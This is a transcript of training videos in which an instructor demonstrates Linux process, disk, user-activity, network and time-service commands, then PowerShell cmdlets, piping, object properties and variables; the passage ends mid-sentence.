[Video description begins] nginx is placed inside the double quotation marks. [Video description ends]
And here two of the processes are child processes, so the one with 814 and 815 as the process IDs. And the
813 is obviously the parent process or the session leader as it's sometimes called. If we want to see only the
session leader, we could use ps -d -N for negate so it's the opposite. So I'll pipe that into grep nginx and we get
the other one. So we get the child processes with -d, and with -d -N we get the parent process or the session leader.
We can see the current terminal processes just by doing ps of uppercase T. So it shows the local terminal's processes: the
ps command I just ran and the bash shell itself. We can do ps r to get the running processes, and when I run ps
r that's the only running process in this case. If I go into another terminal window, I tab over and let's do a ping
of localhost.
[Video description begins] He switches back to the previous terminal window. [Video description ends]
And now if I do ps r, it still gives me the same thing because this is running on a different terminal. So I'll
Ctrl+C. So it's only running processes within the current terminal. I can actually look by process ID. If I do ps -
p I can specify a process ID, say 813. And it will return the nginx process with 813. I can now put it in a list. I
can see if, let's say, 814 and 815 are running. So in double quotes, I put 814 space 815 and it returns those two
processes. We can do it by user, let's say ps U and then in quotes www-data. And that shows that the php-fpm
and the nginx worker processes are all running as the user www-data. We could do ps U of root and see what's running as root.
[Video description begins] root is placed inside the double quotation marks. [Video description ends]
And of course, there are quite a few. And we could look at the local users, ps U of steve space bob. And we put
these in quotes. So we have a list of users where we can see all of the processes belonging to those two users.
Now there's a lot of information shown here. So I've just cleared the terminal window. And I'm going to run a
formatted ps command. So ps -e. Now we don't specify f because we don't want the full format. We want to
specify it for ourselves. So --format=pid and cmd in quotes. And now I'll pipe this into grep with nginx.
[Video description begins] nginx is placed inside the double quotation marks. [Video description ends]
And we get the process IDs and the process names, the commands, but nothing else. So those are some of the
various options we have with the ps command. And there's quite a lot we could do with it to narrow down what
process we're looking for, and filter it by various criteria. And that concludes this demonstration of process
reporting.
query disk space use, partition information, and directory contents of a Linux system
[Video description begins] Topic title: Disk Use. Your host for this session is Steve Scott. [Video description
ends]
In this video, I'll demonstrate how to query disk space use, partition information, and directory contents of a
Linux system.
[Video description begins] A blank terminal window displays. [Video description ends]
So to get the amount of free space, we use disk free, the df command. So it gives us a file system, the amount of
1K-blocks, the amount used, and the amount available and the use percent. And then it shows where it's
mounted on the file system. Now some of these file systems or devices are not necessarily hard disk space.
Some of them are loop devices like /dev/loop, followed by a number which are pseudo-devices. So we don't
really address those or store information there. But other devices, like /dev/sda1, represents our main hard disk.
Now, it's showing a use of 33% and it's showing these 1K-blocks with these fairly large numbers. Now we
don't really think of these as human-readable numbers. But there's an option for that. So we can type df -h for
human readable. So it will give us the unit, whether it's megabytes, gigabytes, or kilobytes depending on the
device and how much space there is and how much is available. So we see that /dev/sda1 is a 20 gigabyte disk
or has 20 gigabytes of space. We've used 6 gigabytes, 6.0 gigabytes. And there's 13 gigabytes available
roughly. Now, for querying our disk free visually ourselves, so that we can interpret it, the human readable output makes sense.
But if we're writing scripts or programs that use this information to make decisions, say, when the disk is
almost full and we need to notify somebody, we should use the regular output, and not the human readable
version. We can also do the same thing with disk usage. So if we need to track down what directories or files
are using up the most space, we can use the du command. Now in my home folder, there are a lot of files.
There's files that are settings for various programs. There's files that are stored in the desktop, in the
documents, in various folders. And it's not always easy to track down what we should be looking for.
Now, any folder or file that begins with the period is a hidden file or folder. And we can actually exclude those
if we put in the right option. So let's do du -h for human readable just as we would with disk free. And we're
going to do --exclude, and we'll specify "./.*" and then we close the quotes. Now if I run this, it simplifies it.
So it still has some fairly long directory with all of the files in those directories and how much space they're
using. But all of the hidden ones are not being shown. We can simplify this a little further by specifying
another option, --max-depth, and we set that equal to 1.
[Video description begins] He edits the previous command which now reads as: du -h -- exclude = "./.*" --
max-depth=1. [Video description ends]
So it'll only look at the top-level directories. And in this case, we have snap, Downloads, Public, Documents,
Desktop, Music, Videos, Pictures, and Templates. And if we'd like to see which one is using the most, we just
look down the leftmost column, and we can see there's 20K and 4K. Some of these directories are empty or
almost empty, except for this Desktop one, which is taking up 20 megabytes, or 20M. Now we can also look at
a higher level.
So we don't have to just look in the current folder. We can specify a folder. So let's do du of --max-depth=1 /.
So we're going to look in the root folder. So we'll run this command, but it gives us lots and lots of errors or
permission denied problems. And it really clutters up the output. Now we can redirect these error messages, which go to standard error, to /dev/null. So we'll type 2 greater than /dev/null.
[Video description begins] He enters the following command: du --max-depth=1 / 2>/dev/null. [Video
description ends]
And that makes it even easier to read. And we could even put in the -h in here to make it human readable.
[Video description begins] He edits the previous command which now reads as: du -h --max-depth=1 /
2>/dev/null. [Video description ends]
And we can see where the space is being used on our system in each of the main folders. And if we go down
the list we can see the most use, so the 1.1 gigabytes in this /var folder, 14 megabytes in /etc, 3 gigabytes
and /usr. In the home folder where the documents are, there is 59 megabytes being used. So we can analyze
and track down disk usage. We can do it human readable so that when we run the commands, we can quickly
make sense of it by looking at the units, the megabytes, the kilobytes and the gigabytes. So we can easily see
where that data is coming from or we can use it without if we want to use a script to interpret the numbers.
Now one more command I'm going to run is for partition information.
For that, we use fdisk with -l, for list. Now in this case, it gives me permission denied, because we need privileged access to look at partition information. So I'll run this again with sudo. And here we get information. So we have all of the disks with /dev/loop, which we can ignore if we're just looking for hard disk space or hard drive partition information. So it gives some information on /dev/sda. It tells me that it's 20 gigabytes, and it shows how many bytes and how many sectors. It shows the disklabel type, in this case it's labeled as dos, and it has an identifier. And then it shows each device: whether it's a boot device (it has an asterisk, so yes, it is the boot device), where it starts and where it ends in terms of sectors, and its size, its ID, and its type. And that concludes this demonstration of querying disk use.
[Video description begins] Topic title: User Activity. Your host for this session is Steve Scott. A blank terminal
window displays. [Video description ends]
In this video, I'll demonstrate how to monitor user activity on a Linux system. So the first command to check user activity is the who command. And this gives us information about who's currently logged in, as well as their most recent login. So in this case, I have two users, Steve and Bob. And Steve logged in the year 2020, the third month, so March 23, at 10:37. And Bob logged in on the same date at 15:41, so at 3:41 in the afternoon. Now similar to the who command, but with a bit more information, including the idle time, CPU use, and the type of terminal session, is the w command.
So it gives us the same information, with a login time but not the date in this case, the idle time, the CPU use, the CPU average, and how they're logged in. This mate-session is the desktop environment that the user is using, in this case the MATE desktop. We can also use the last command. This gives us the list of recent logins, the dates and times of those logins, and how long each of these sessions has lasted. Now the most recent ones at the top give us pretty much the same information, or very close to the same information, as the who and w commands.
So we get Bob and Steve on tty numbers 8 and 7. We get the date and time, and we get something like "gone - no logout" or "still logged in". So for the latest session, we get some information where there's no logout. And in our other sessions, it shows the logout time, and how long the session lasted in the number of hours. Now one more way to monitor user activity is the history command. Now if I do history on my local user, it gives me quite a long history of commands that I've run recently. So in this case, if we look at the numbers, there are over 2,000 commands, but that's fine for seeing my own history. I'll hit clear.
If I want to see the history of another user – say I'm logged in as Steve, but I want to see Bob's history, I want to see what Bob is doing – well, there are a few ways I can do that. One is I can switch to Bob's account using su - bob. And if I know Bob's password, I can log in. Or if I use sudo, I can connect as Bob and do a history command. But if I run commands logged in as Bob, it saves those commands in Bob's history. If I just want to see what's in Bob's history, I can actually use the cat command and then /home/bob/.bash_history, and I can see what commands he's run. But of course, this is a protected file.
[Video description begins] He enters the following command: cat /home/bob/.bash_history. [Video description ends]
So as a regular user, I don't have access to see the history of another user's account. And that's actually a good
security measure. If I want to see the user activity for Bob, I need sudo privileges or root privileges.
[Video description begins] He edits the previous command which now reads as: sudo cat /home/bob/.bash_history. [Video description ends]
So if I run it as root, I can see that Bob's recently run ls, ls -la and the exit command. So if there's any suspicious activity, any suspicious commands being run, we can see that activity in Bob's bash history file. And that concludes this demonstration of looking at user activity in a Linux system.
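As a small sketch combining the commands from this demo into a quick audit of user activity (the username bob comes from the demo; the output file name is illustrative):

  # Who is logged in now, recent login sessions, and one user's recent commands
  who
  w
  last | head -20
  sudo cat /home/bob/.bash_history | tail -50 > bob_recent_commands.txt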
[Video description begins] Topic title: System Activity. Your host for this session is Steve Scott. A blank
terminal window displays. [Video description ends]
In this video, I'll demonstrate how to use system monitoring tools to monitor Linux activity. So the first command I'm going to run is uptime. So this displays a single line including the current time, the uptime – the length of time the system has been running since the last reset or reboot – as well as the number of logged-in users and the system load averages. Now another command we often run to monitor is the top command. So this shows us, well, some of the same information we had in uptime on the first line, and we get the total number of tasks, and the number of running, sleeping, stopped and zombie tasks.
And you'll notice as we're watching this, this is constantly updating. So it's much like the Activity Monitor in macOS or the Task Manager in Windows, but it's done here in this command line application. We also get the percentage of CPU use, and the memory use in kilobytes – so the total, the free, and the used – as well as whether we're using any swap space. Now we can also toggle this summary info. If I press the t key, I can toggle the CPU section off. If I use the m key, I can change the display of the memory use until it disappears.
And I can also interactively select the ordering of the various columns. So if I press F, I can pick the column to sort by, let's say by memory use. So if I hit Enter, then Q, it goes back to the screen with the sorting done by memory. And then if I hit Q, I quit out of the top command. Now I can also check the free memory from the command line using the free command, or using the -h for human readable, like we do in other commands like df and
[Video description begins] He enters the following command: free -h. [Video description ends]
du that I demonstrated in the video titled Disk Use. And in human-readable form, it shows the number of gigabytes. So I have 3.9G available, 569M used, and 2.1G free. And it shows shared memory, buff/cache memory, and available memory. Another command we use to monitor system activity is the netstat command, to get a snapshot of network statistics. So it's a monitoring tool for network connections, and it's quite frequently used for TCP and UDP connection information. So if I type netstat -atu, it gives me the TCP connections and the UDP connections.
And these are active services that are running on various ports. So I have http, printing with ipp, domain services, etc. So they're all listed here in these connections. Now I can also put this behind the watch command. So if I do watch netstat -atu, it will sit here and refresh every two seconds. And now I'll switch over to another terminal window and type something that'll make an outgoing connection – let's do a sudo apt update.
And while this is working, if I switch back to watch, it'll show the connections show up each time it updates. So it made a few connections and they appeared here in the netstat monitor. So this is just one way, one easy way, of monitoring for network connections. And that concludes this demonstration of system activity monitoring.
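As a quick sketch of the monitoring commands used in this demo (the two-second interval is watch's default, shown explicitly here for clarity):

  uptime                     # current time, uptime, logged-in users, load averages
  free -h                    # memory and swap in human-readable units
  watch -n 2 netstat -atu    # refresh the TCP/UDP connection list every 2 seconds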
During this video, you will learn how to configure time servers and set the correct date, time, and time zone on
a system.
Objectives
configure time servers and set the correct date, time, and time zone on a system
[Video description begins] Topic title: Time and Date Services. Your host for this session is Steve Scott. A
blank terminal window displays. [Video description ends]
In this video, I'll demonstrate how to configure time servers and set the correct date, time, and time zone on a
system. So let's start with the date command. So, if I just type in date in the terminal window I get the current
date. I get Tue for Tuesday, March 24 at 00:51:08 ADT 2020. So this is in the typical format we'd see or the
RFC 2822 format I believe. We can also change this format: if we just want to get the time, we can put +%T, and it will just give us the time. Or date -u – similar to the format we get just running date directly, it gives me the same date but in UTC time. Now if I type date -I, it gives me just the local date.
So this is the date in the ISO 8601 format. So with the four-digit year, the two-digit month with a leading 0, and the two-digit day, also with a leading 0. If I type date -Ins, it's going to give me the same information but to a resolution of nanoseconds. So we get the date, a T character, the time, then a comma and the fractional seconds at full nanosecond resolution – so 13.770577448 seconds. And then the time zone, the -03:00, so negative three hours is the time zone. So this is the ISO 8601 format. Now if I don't need the nanoseconds, I can just give the command date -Is – hyphen, uppercase I, lowercase s – and it gives the same information but to the resolution of seconds.
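A quick sketch of the date formats shown above (the output values are examples in the same style as the demo, not the exact on-screen times):

  date          # e.g. Tue Mar 24 00:51:08 ADT 2020
  date +%T      # time only, e.g. 00:51:08
  date -u       # same format, but in UTC
  date -I       # ISO 8601 date, e.g. 2020-03-24
  date -Ins     # ISO 8601 with nanoseconds, e.g. 2020-03-24T00:51:13,770577448-03:00
  date -Is      # ISO 8601 to the second, e.g. 2020-03-24T00:51:13-03:00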
Now we can also synchronize the date and time using the timedatectl command. So on Ubuntu or Debian-based systems, this is the command used rather than the NTP (Network Time Protocol) daemon or the ntpdate program. So if I run this, it gives me the Local time, the Universal time, the RTC time, and the current Time zone – I'm in America/Halifax, so this is Atlantic Daylight Time, so -3 hours. Is the System clock synchronized: no. Is the systemd-timesyncd service active: yes – so it's synchronizing with the time server. And RTC in local timezone: no. I'll do a cat on /etc/systemd/timesyncd.conf.
So this has the information about the time synchronization. So we can put in our own NTP server if we want, instead of using the default. In this case, the defaults are shown, so the current default is ntp.ubuntu.com. If I'd like to change this, I can open this with nano, and I believe I need to do that with sudo: sudo nano /etc/systemd/timesyncd.conf.
[Video description begins] The command reads as: sudo nano /etc/systemd/timesyncd.conf. [Video description ends]
So I'll go down to the NTP line and I'll change this to pool.ntp.org, so that it will select a nearby NTP server to synchronize with. And the fallback NTP I can leave as ntp.ubuntu.com. So I'll do a Ctrl+O to write out, and exit. And now I can do sudo systemctl restart – we want to restart the service with the new settings – systemd-timesyncd.service, and I need to spell that correctly: timesyncd.service. And we've restarted the service. So now it's going to use our new settings in the configuration, to use the NTP server of our choice. And that concludes this demonstration of time and date services.
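Putting the steps together, a minimal sketch of the change made in this demo (pool.ntp.org is the server chosen on screen):

  sudo nano /etc/systemd/timesyncd.conf
  # In the [Time] section, set:
  #   NTP=pool.ntp.org
  #   FallbackNTP=ntp.ubuntu.com
  sudo systemctl restart systemd-timesyncd.service
  timedatectl    # confirm the synchronization status afterwards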
Upon completion of this video, you will be able to describe important system configurations found in the /etc
folder of a UNIX-based system.
Objectives
describe important system configurations found in the /etc folder of a UNIX-based system
[Video description begins] Topic title: /etc Configurations. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll describe important system configurations found in the /etc folder of a Unix or Linux based
system. So the /etc folder contains program and system wide configuration files. So configuration files that are
not user-specific. So any applications, programs, or system wide commands or settings, are typically defined in
/etc.
[Video description begins] Screen title: Tabular Configurations [Video description ends]
For user-defined or user-specific configurations, they're usually found in the user's home folder. One class of configuration found in /etc is tabular configurations. Those are ones like /etc/inittab, where we have startup service initialization info. The inittab is specific to the System V init system and its services. In Ubuntu Linux, the Upstart service replaced this for a while, and now systemd manages the boot process, which services to run, and the run level, replacing inittab.
But many Unixes still use the inittab tabular configuration. We also have the crontab, in /etc/crontab. So this is a table of scheduled tasks or jobs that run on a periodic timer. And we also have the fstab, so /etc/fstab, for file system tabular configuration. So these are the file system mount points: hard drives, SSDs, or any disk media that is connected and automatically mounted or mapped into the file system is defined in this file.
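For illustration, entries in these tabular files look roughly like this (the device, mount point, script path, and schedule below are made-up examples, not from the presentation):

  # /etc/fstab – device, mount point, type, options, dump, pass
  /dev/sda1   /       ext4    errors=remount-ro   0   1

  # /etc/crontab – minute hour day month weekday user command
  0 2 * * *   root    /usr/local/bin/backup.sh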
[Video description begins] Screen title: Run Commands (rc) Configuration [Video description ends]
We also have the run commands or rc configurations. So these configurations are suffixed or prefixed with rc. There's inputrc, in /etc/inputrc, for readline configuration – so when a shell script stops and prompts for input, that behavior is configured here. We also have /etc/rc.local, which stops and starts services, and /etc/rc.sysinit, which is for system initialization tasks.
[Video description begins] Screen title: Important Configurations in /etc [Video description ends]
Now, what are some other important configurations in /etc? Well, we have the sudoers file, the configuration for how the sudo program is run – so that a regular user account can run commands, or a single command, with root privileges. We have /etc/init.d, which typically starts services or local applications on many Unix or Linux systems.
And the /etc/default folder contains some default configurations that we can use to reference. And the
/etc/hosts file, so this defines host names and their IP addresses often on the local network, especially ones that
can be resolved before DNS services are needed. It can also be used to override DNS entries from external
sources so you can define the IP address and host name mappings locally.
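For example, a couple of illustrative /etc/hosts entries (the IP addresses and host names here are made up):

  127.0.0.1     localhost
  192.168.1.50  fileserver.local  fileserver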
[Video description begins] Screen title: Getting Help (man pages) [Video description ends]
Now, where do we turn when we want to get help with our /etc configurations? Well, we turn to the man pages, short for manual pages. So when in doubt, you type the word man followed by the name of the configuration or command associated with the configuration you're looking to get help with. man groups is one example: we type man followed by groups, and it gives us the manual on the groups command.
We also have man crontab or man fstab to get information on those various files. Now, if you'd like to get a picture of the entire /etc folder, you can cd into /etc on your Linux system and type ls, and it'll give you a picture of just how configurable Linux and Unix-based systems are and all of the different options. And that concludes this presentation on /etc configurations.
Objectives
So in this course we've examined how to work with management and monitoring tools in the Unix and Linux
environments. We did this by exploring how to securely connect to a remote server. How to work with user
accounts in a Linux system. The elements of an Internet protocol, an IP routing table, and a network interface.
And how to perform domain name system, or DNS, lookups. And the log files for monitoring critical events on a Linux system.
Then how to use the ps command to retrieve process information. How to retrieve disk usage, partition
information, and directory contents of a Linux system. How to monitor user and system activity on a Linux
system. How to configure the time and date services, and the system configurations in the /etc folder of a Unix
system. Coming up next, we're going to explore identifying malware types and classification approaches.
You'll learn how to use Bash variables, conditionals, and loops and apply timing to a Bash script. You'll also
learn how to change and list directories using Bash scripts, as well as how to change the ownership and
permissions on files and folders. Next, you'll create files and custom functions, use piped commands to chain
Bash scripts together, and redirect outputs using a Bash script.
Table of Contents
Objectives
redirect the output of standard out and standard error text in a Bash script
Objectives
You'll learn how to use PowerShell cmdlets, get object properties, and filter inputs. You'll then learn how to
use variables, conditionals, and loops in a PowerShell script. You'll also learn how to get interactive help,
create custom functions, use piped commands to chain PowerShell scripts together, and set the execution
policy using a PowerShell script.
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview. The instructor for this video is Steve Scott. [Video
description ends]
Hi, I'm Steve Scott. I've been a software developer and tech consultant for almost a quarter of a century. I've
traveled around the globe to serve clients, where I've been responsible for building system architectures, hiring
development teams, and solving complex problems.
With my toolbox of Languages, Platforms, Frameworks, and APIs, I round out my technical experience with
an academic background in Mathematics and Computer Science.
In this course, we're going to explore PowerShell scripting, including working with PowerShell objects and
properties, variables, flow control, and looping structures.
I'll start by examining the purpose and use cases for PowerShell scripting. I'll then examine how to work with
different types of PowerShell objects and their properties, as well as PowerShell variables and arrays.
Next, I'll demonstrate how to use flow control, create custom functions, and create loops in PowerShell.
Lastly, I'll run the commands at the PowerShell prompt and explore the runtime environment of a PowerShell
script.
[Video description begins] Topic title: Identifying PowerShell Scripts. The instructor for this video is Steve
Scott. [Video description ends]
In this video, I'll present some background and motivate the purpose and use cases for PowerShell scripting.
PowerShell is the shell command language created by Microsoft for task automation in its Windows operating system, with the goal of making command line or console applications much more powerful and modern. It was also made open source and cross-platform with what's called PowerShell Core, built on top of .NET Core. Now the old command.com or cmd.exe systems in use in DOS and Windows for the past 40
years needed to be improved to make performing repetitive commands and administrative tasks easier and
more extensible. What it provides is task automation with pipeline-driven outputs and inputs, making it easy to
chain commands together and simplify tasks.
Apart from running shell commands and task automation, the configuration management capabilities of
PowerShell are another important feature. It's what's called a declarative desired state configuration, or DSC. It
also provides command-lets (cmdlets), which are specialized classes for scripting, done in a consistent fashion, so it's much easier to get help when you need to find out what a command does or to find help on what you're trying to do.
So what are some of the primary tasks PowerShell is used for? Well, the first is administrative: being able to manage Windows systems and programs, the registry, and the file system.
System administrators can also use it more easily to remotely administer a Windows computer or server,
including tasks that are scheduled to run at a particular time, so you have control over the scheduler via scripts
to configure your systems automatically.
You have network and process tasks that you can manage. So managing connectivity and settings and
monitoring activity, launching and stopping processes, all via script. Access to perform routine tasks on files
and in the file system, including the registry keys and values. And in general, the tasks are all driven by scripts.
So you're writing some code to carry out automation and one of its core capabilities is integrating with the task
scheduler to run at specific times of day or days of the week.
Now PowerShell is also cross-platform; it's not limited to a Windows system. There's a subset of PowerShell
capabilities available on Linux through the PowerShell core. So under Windows, the full capabilities of
PowerShell derive from the .NET Framework, whereas the cross-platform capabilities derive from the features
or functionality exposed by the .NET Core, but it's still a very powerful subset.
In terms of cybersecurity, there are some features we should be automating to improve security. So we start
with monitoring and logging, including automated event detection and log file management. We have file
system security, including access controls and security policy management, so permissions for users and
resources.
But we also have to be aware of PowerShell exploit concerns in terms of cybersecurity – knowing what's going
on in a script, being able to navigate and understand the syntax, being able to spot when untrusted code is
downloaded and run. Remote code execution vulnerabilities do come up. Since it's a common practice to
download scripts from the Internet, being able to audit for security vulnerabilities is essential.
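As a rough illustration of the monitoring and file-system security tasks mentioned here (the log name, event count, and folder path are illustrative; reading the Security log typically requires an elevated session):

  # Pull the ten most recent Security log events
  Get-WinEvent -LogName Security -MaxEvents 10 |
      Select-Object TimeCreated, Id, LevelDisplayName |
      Format-Table -AutoSize

  # Review the access control list on a folder
  Get-Acl -Path C:\Scripts | Format-List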
Objectives
[Video description begins] Topic title: Using PowerShell Objects. The instructor for this video is Steve
Scott. [Video description ends]
In this video, I'll demonstrate how to identify some different types of PowerShell objects. I'll share some
common PowerShell command-lets used in everyday PowerShell scripting. I'll select the line of code, and run
one command at a time, so we can talk about the objects in the output as we go.
[Video description begins] A Visual Studio Code window is open to a demo file. A few lines of code are
already present in the Editor window. The Panel area at the bottom of the window is open to the Integrated
Terminal. [Video description ends]
The nice thing about many command-lets is that it's usually easy to figure out what they do – at least in a
general sense – based on the name. Such as Get-Date, for instance.
[Video description begins] The instructor clicks on the first line of code, which reads Get-Date. [Video
description ends]
Obviously, it returns date information, but what information? What does the object return look like? So I can
either use F8 or Run Selection from the toolbar.
[Video description begins] The instructor clicks the Run Selection button in the top-right corner of the
window, and the output is displayed in the Integrated Terminal. [Video description ends]
And in this case, it just gives a DateTime object displayed as a string. So Saturday, July 18th, 2020, 5:21:11 AM, and that's in UTC time.
Now, exploration is a good way to learn. You can also learn from the Get-Help command-let to display more
detailed information, which is what I'll do for a few commands below. So the format we have is a good human
readable format, but it's not a great format for something we'd like to parse with another program, or if we'd
like to pipe this into another command. It's better to use an object return or to reformat it in ISO 8601
compliant format. So I can use the -Format parameter, with "o" in a string; so in double quotes.
[Video description begins] The instructor types in the code next to Get-Date on the first line of code. [Video
description ends]
And if I run this line of code again, in the output, I get a proper ISO 8601 format. So the 4-digit year, hyphen,
2-digit month, hyphen, 2-digit day, T, and the hour in 24-hour format, to a fractional second, and then the time
zone. So in this case: -7. Now if I want to see what that time zone is, there's this Get-TimeZone command that
I can run.
[Video description begins] The instructor selects the code on line 3, which reads: Get-TimeZone, and then
clicks the Run Selection button. [Video description ends]
And this returns information about the time zone. This object has a number of properties, like the Id and
DisplayName, StandardName, DaylightName, BaseUtcOffset – so in this case, -8 – and
SupportsDaylightSavingsTime: True. If we'd like to generate a random number, we have the Get-Random
command-let.
[Video description begins] The instructor selects the code on line 5, which reads: Get-Random, and then clicks the Run Selection button. [Video description ends]
So if I run this – and keep running it – each time I run it, I get a different random number. Now this is a 32-bit
random number – so anything from zero to the maximum 32-bit number.
If we're not sure what it's going to return, we can always use the Get-Help command-let. So Get-Help,
followed by the command we'd like to run.
[Video description begins] The instructor highlights part of the code on line 6, which reads: Get-Help Get-Random -Online. [Video description ends]
And we can use it locally; so if I select Get-Help Get-Random, I can actually copy that, and put it in the
terminal window at the bottom – paste it in – and in this instance, it gives me some basic information – the
name, the syntax – but it doesn't give me the detailed information. And in this case, I don't have the full help files locally, but I can use Get-Help Get-Random online. So I can put -Online – like I have on line 6 – and
I run it, it'll open it up in a browser window, and go right to the Microsoft documentation pages, and pull up
this command-let.
So Get-Random, and it has all the detail, the description, and as I mentioned, it's a 32-bit unsigned integer from
zero to MaxValue of an int32, so a 32-bit int, which is slightly over 2.1 billion. And the nice thing here: it has
some examples. We can specify a maximum; so Get-Random -maximum 100. So we can copy the code right
from the documentation. Either paste it into the terminal to test it, or if we'd like to use it in our code, we can
also paste it right into our code, and save it into our script, and run it from there. And again, each time I run,
the Get-Random function returns a different number.
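Copying the documentation example, plus a couple of variations for illustration (the bounds below are arbitrary; -Maximum is exclusive):

  Get-Random -Maximum 100                          # 0 through 99
  Get-Random -Minimum 1 -Maximum 7                 # 1 through 6, like a die roll
  Get-Random -InputObject @('red','green','blue')  # pick a random item from a collection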
We can also get process information. Now I have running, in another window, the built-in Calculator and if I
run a Get-Process on Calculator, it's gonna give me process information.
[Video description begins] The instructor clicks on the code in line 9, which reads: Get-Process
Calculator. [Video description ends]
So, let's go over the information that that gives us. So it gives us the number of Handles that the process has opened, the NPM – the non-paged memory that the process is consuming – the PM – the pageable memory that the process has – the WS, or working set memory – so the recently referenced pages of memory – the amount of processor time it's used: 1.22 seconds, the process ID or PID: 9152, and the ProcessName: Calculator.
You could also add some other parameters onto this. I can also put IncludeUsername to find out the process
owner.
[Video description begins] The instructor types in -IncludeUsername next toGet-Process Calculator on line 9,
and then clicks the Run Selection button. [Video description ends]
But we get some red text which is not good in the terminal window. This brings up an important consideration
when running PowerShell scripts. In this case, the IncludeUsername parameter requires elevated user rights.
Try running the command again in a session that has been opened with elevated user rights; that is, run as administrator. Now I'll get into this more in the video titled 'PowerShell Execution', so we'll leave it as is for
now.
One of the important and powerful features of PowerShell and other scripting languages is being able to pipe
the output from one command into another command. So here on line 12, I have Get-Service. Then the output of Get-Service, we say, is piped into Out-GridView.
[Video description begins] The code on line 12 reads: Get-Service | Out-GridView. [Video description ends]
So there's a pipe character in between the two command-lets, and Out-GridView is going to take the input from Get-Service, and display the results in a separate GUI. So it's going to open up an interactive window that we can use to display the results, and interact with them in some cases.
So if I run the Get-Service piped into Out-GridView, we get a window open up, and it shows the command in
the title bar, and we see all of these services: the Status, the Name and the DisplayName of all these services –
running, stopped and their states. And we can filter some of this by Name or by DisplayName so we can search
within this grid view. So it's quite handy to have in a GUI environment if you want to interact and display
some tabular results. So I'll close that, and now the last one.
Now, of course, this wouldn't be complete if I didn't display the command-let for Get-ChildItem. Now this one
seems a little bit strange – Get-ChildItem – but it's actually displaying the contents of a particular directory, so
we can do Get-ChildItem, -Path of C:\. Now I'm going to copy just this part of it out, paste it into the terminal,
and run it as is. So it gives the directory listing: the Mode of the file, the LastWriteTime, the Length, and the Name.
Now we can also interact with this and sort it. And if we pipe the command, the contents of this C:\ – the root
directory – I'm going to pipe this into Sort-Object, and specify the Property. So -Property of the
LastWriteTime, and I'm going to put it in descending order, so I specify -Descending.
[Video description begins] The instructor clicks on the code on line 14, which reads: Get-ChildItem -Path C:\
| Sort-Object -Property LastWriteTime -Descending, and then clicks the Run Selection button. [Video
description ends]
Now if I run this command, I get the same output but the dates go from the most recent to the oldest in that sorted order.
And that concludes this demonstration of common PowerShell objects.
Objectives
[Video description begins] Topic title: Exploring PowerShell Properties. The instructor for this video is Steve
Scott. [Video description ends]
In this video, I'll explore how to work with PowerShell object properties. So on line 1, I have a Get-ChildItem command-let, followed by -Path and a period. This gives us a directory listing in the form of a PowerShell object that we pipe into Sort-Object, which sorts on the Length, with -Descending to do the sort in descending order. Then we pipe the results into Format-Table. So we have a nice chain of PowerShell command-lets here, all piped from one to the next. Format-Table formats the output to be displayed so that we can limit the number of properties that are shown in the output, like I've done here with -Property and the column names Name and Length.
[Video description begins] The first line of code reads as follows: Get-ChildItem -Path . | Sort-Object Length -
Descending | Format-Table -Property Name, Length. [Video description ends]
So I'm going to run this first line of code on its own. And in the result, we get a directory listing from the
current directory. And the files that are in it, and the length of each of those files sorted in descending order of
length – so the number of bytes in each file.
The next example of getting properties in PowerShell is using Get-Date. I assign Get-Date to the variable $d on line 3, then on line 4, I call $d.GetType() to verify the object's type.
[Video description begins] The code on line 4 reads: $d.GetType() [Video description ends]
Then, just $d on its own, to see the entire contents of the variable on line 5, and then on line 6, I piped $d into
Select-Object, which lets me specify the properties I'd like to extract from the date, namely the year, the
month, and the day. [Video description begins] The code on line 6 reads as follows: $d | Select-Object Year, Month, Day. [Video description ends] So I'll highlight these four lines of code – from lines 3 to 6 – run the
selection, and let's have a look at the output.
So in the output, the first thing is the GetType result, so it's a DateTime type. And then the contents of DateTime
has things like the full date, the day, the day of the week, the day of the year, hour, the number of milliseconds,
minutes, months, second, ticks, time of day, year, et cetera. So there's all this data information stored in this
object and we extract the year, the month and the day. So in the output, we have year, month, day – the last
thing printed from the contents of line 6, where we did the Select-Object.
Then I'm going to extract some properties from a single file. So instead of specifying an entire path to read
files from, I'm going to call Get-ChildItem with the local file.txt that's in my current directory, that just has the
text: Hello, World!
[Video description begins] The code on line 8 reads as follows: $f = Get-ChildItem ".\file.txt" [Video
description ends]
What I'm going to extract, the property I'm going to extract here, is the length. So on line 9, I have $f that I
pipe into Format-List and then I extract the property, so -Property with Length, and then I output $f. So I'll
highlight these three lines of code, run the selection, and we get the results. So the Length we extracted is 13, and the contents of $f gives us the file Mode, the LastWriteTime, the Length, and the Name.
In the last example, I'm going to demonstrate using a Where clause to filter properties based on a simple
regular expression. So on line 12, I have Get-Process, so this is going to get the running processes. It's going to
pipe it into Select-Object, which selects the ProcessName and Id, which gets piped into the Where-Object, and
then inside of braces I take the input from the previous command – so what comes before the pipe – and
reference it using $_.ProcessName.
So I'm going to take the ProcessName, do a -match, and give it the regular expression ^Calc.*. So this is going
to extract any processes that start with Calc.
[Video description begins] The code on line 12 reads: Get-Process | Select-Object ProcessName, Id | Where-
Object { $_.ProcessName -match "^Calc.*" } [Video description ends]
So since I have the calculator running, it should find one. So I'm going to run this line of code. And in this
case, it gives me Process Name Calculator and ID 9152.
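The same filtering pattern works against other properties; as a rough sketch (the 100 MB working-set threshold here is arbitrary, not from the demo):

  Get-Process |
      Select-Object ProcessName, Id, WorkingSet64 |
      Where-Object { $_.WorkingSet64 -gt 100MB } |
      Sort-Object WorkingSet64 -Descending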
Objectives
[Video description begins] Topic title: Using PowerShell Variables and Types. The instructor for this video is
Steve Scott. [Video description ends]
In this video, I'll demonstrate some different types of PowerShell variables and arrays, and some of their
important behaviors.
So we'll start out in the script on line 1. I have $sum = 2 + 3. So, this is a basic numeric sum. And I'll run the
code. And so we've assigned the sum variable. And on line 2, I have Write-Output of $sum. And that gives me
the answer 5. That's pretty much expected. We could also get some information about the object itself by using
the Get-Member commandlet. So on line 3, I have $sum | Get-Member. I'll run it, and let's have a look in the
output of the terminal.
So there's some information here: it gives me the TypeName – in this case System.Int32 – so it's a 32-bit int,
and it gives me the Name, the MemberType and the Definition – the basic definition of the Member Methods
that this object has. So this is an Int object with things like conversion ones to convert it to different types of
numbers – ToDecimal, ToDouble, ToChar, ToDateTime. It also has some handy functions, like GetType,
GetHashCode and Equals functions so it can be compared to other objects of the same type. So we can tell a
lot of information about objects by using Get-Member.
Now I'll run the next block of code. So if I highlight lines 5, 6 and 7— So Line 5 has sum – or $sum, so we're
